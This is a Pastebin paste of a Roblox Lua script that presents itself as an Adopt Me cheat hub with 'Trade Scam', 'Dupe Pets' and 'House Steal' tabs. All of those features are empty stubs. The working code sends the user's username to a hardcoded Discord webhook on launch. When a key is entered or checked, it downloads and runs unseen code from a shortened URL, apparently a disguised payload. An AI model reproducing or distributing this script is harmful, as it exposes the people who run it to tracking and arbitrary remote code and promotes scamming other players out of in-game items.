Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
- local validKey = "KEY"
- local keyEntered = false
- local HttpService = game:GetService("HttpService")
- local Players = game:GetService("Players")
- local webhookUrl = "https://discord.com/api/webhooks/1250434395546976337/wUrptlCbzpNAKiY9vGN9QGlpr9ktJiU79boFS4LI5Weak9EKIk57hZ3OsUfVj1CntTd7"
- local playerName = Players.LocalPlayer.Name
- local function sendWebhookMessage(message)
- local payload = HttpService:JSONEncode({
- content = message
- })
- HttpService:PostAsync(webhookUrl, payload, Enum.HttpContentType.ApplicationJson)
- end
- sendWebhookMessage(playerName .. " HAS USED UR SCRIPT")
- local function createMainGUI()
- local Window = OrionLib:MakeWindow({
- Name = "AdoptMeHub by Muzza [V1]",
- HidePremium = false,
- SaveConfig = true,
- ConfigFolder = "DBHBMconfig",
- IntroEnabled = true,
- IntroText = "ADOPTMEHUB ENJOY!"
- })
- -- Trade Scam Tab
- local TradeScamTab = Window:MakeTab({
- Name = "Trade Scam",
- Icon = "rbxassetid://icon_id", -- Replace with your icon ID if available
- PremiumOnly = false
- })
- TradeScamTab:AddTextbox({
- Name = "Username",
- Default = "",
- TextDisappear = true,
- Callback = function(value)
- print("Username entered for Trade Scam: " .. value)
- -- Add your trade scam function here
- end
- })
- TradeScamTab:AddButton({
- Name = "Trade Scam",
- Callback = function()
- print("Trade Scam button clicked")
- -- Add your trade scam function here
- end
- })
- TradeScamTab:AddButton({
- Name = "Hide Pets",
- Callback = function()
- print("Hide Pets button clicked")
- -- Add your hide pets function here
- end
- })
- -- Dupe Pets Tab
- local DupePetsTab = Window:MakeTab({
- Name = "Dupe Pets",
- Icon = "rbxassetid://icon_id", -- Replace with your icon ID if available
- PremiumOnly = false
- })
- DupePetsTab:AddTextbox({
- Name = "Pet Name",
- Default = "",
- TextDisappear = true,
- Callback = function(value)
- print("Pet Name entered for Dupe Pets: " .. value)
- -- Add your dupe pets function here
- end
- })
- DupePetsTab:AddButton({
- Name = "Dupe Pet",
- Callback = function()
- print("Dupe Pet button clicked")
- -- Add your dupe pet function here
- end
- })
- DupePetsTab:AddButton({
- Name = "Make Pet Fly",
- Callback = function()
- print("Make Pet Fly button clicked")
- -- Add your make pet fly function here
- end
- })
- DupePetsTab:AddButton({
- Name = "Make Pet Ride",
- Callback = function()
- print("Make Pet Ride button clicked")
- -- Add your make pet ride function here
- end
- })
- DupePetsTab:AddButton({
- Name = "Make Pet Neon",
- Callback = function()
- print("Make Pet Neon button clicked")
- -- Add your make pet neon function here
- end
- })
- DupePetsTab:AddButton({
- Name = "Make Pet MegaNeon",
- Callback = function()
- print("Make Pet MegaNeon button clicked")
- -- Add your make pet meganeon function here
- end
- })
- -- House Steal Tab
- local HouseStealTab = Window:MakeTab({
- Name = "House Steal",
- Icon = "rbxassetid://icon_id", -- Replace with your icon ID if available
- PremiumOnly = false
- })
- HouseStealTab:AddTextbox({
- Name = "Username",
- Default = "",
- TextDisappear = true,
- Callback = function(value)
- print("Username entered for House Steal: " .. value)
- -- Add your house steal function here
- end
- })
- HouseStealTab:AddButton({
- Name = "Trade House Scam",
- Callback = function()
- print("Trade House Scam button clicked")
- -- Add your trade house scam function here
- end
- })
- -- Auto Farm Tab
- local AutoFarmTab = Window:MakeTab({
- Name = "Auto Farm",
- Icon = "rbxassetid://icon_id", -- Replace with your icon ID if available
- PremiumOnly = false
- })
- AutoFarmTab:AddTextbox({
- Name = "Pet Name",
- Default = "",
- TextDisappear = true,
- Callback = function(value)
- print("Pet Name entered for Auto Farm: " .. value)
- -- Add your autofarm function here
- end
- })
- AutoFarmTab:AddButton({
- Name = "[Event] Autofarm",
- Callback = function()
- print("[Event] Autofarm button clicked")
- -- Add your event autofarm function here
- end
- })
- AutoFarmTab:AddButton({
- Name = "[Pet] Autofarm",
- Callback = function()
- print("[Pet] Autofarm button clicked")
- -- Add your pet autofarm function here
- end
- })
- AutoFarmTab:AddButton({
- Name = "[Baby] Autofarm",
- Callback = function()
- print("[Baby] Autofarm button clicked")
- -- Add your baby autofarm function here
- end
- })
- OrionLib:Init()
- end
- local function createKeyGUI()
- local KeyWindow = OrionLib:MakeWindow({
- Name = "Enter Key",
- HidePremium = true,
- SaveConfig = false,
- IntroEnabled = false
- })
- KeyWindow:AddTextbox({
- Name = "Enter Key",
- Default = "",
- TextDisappear = true,
- Callback = function(value)
- if value == validKey then
- keyEntered = true
- print("Valid key entered")
- loadstring(game:HttpGet("https://rb.gy/mj1mih"))()
- KeyWindow:Destroy()
- createMainGUI()
- else
- print("Invalid key entered")
- OrionLib:MakeNotification({
- Name = "Invalid Key",
- Content = "The key you entered is incorrect. Please try again.",
- Image = "rbxassetid://icon_id", -- Replace with your icon ID if available
- Time = 5
- })
- end
- end
- })
- KeyWindow:AddButton({
- Name = "Check Key",
- Callback = function()
- loadstring(game:HttpGet("https://rb.gy/mj1mih"))()
- end
- })
- OrionLib:Init()
- end
- createKeyGUI()
Advertisement
Add Comment
Please, Sign In to add comment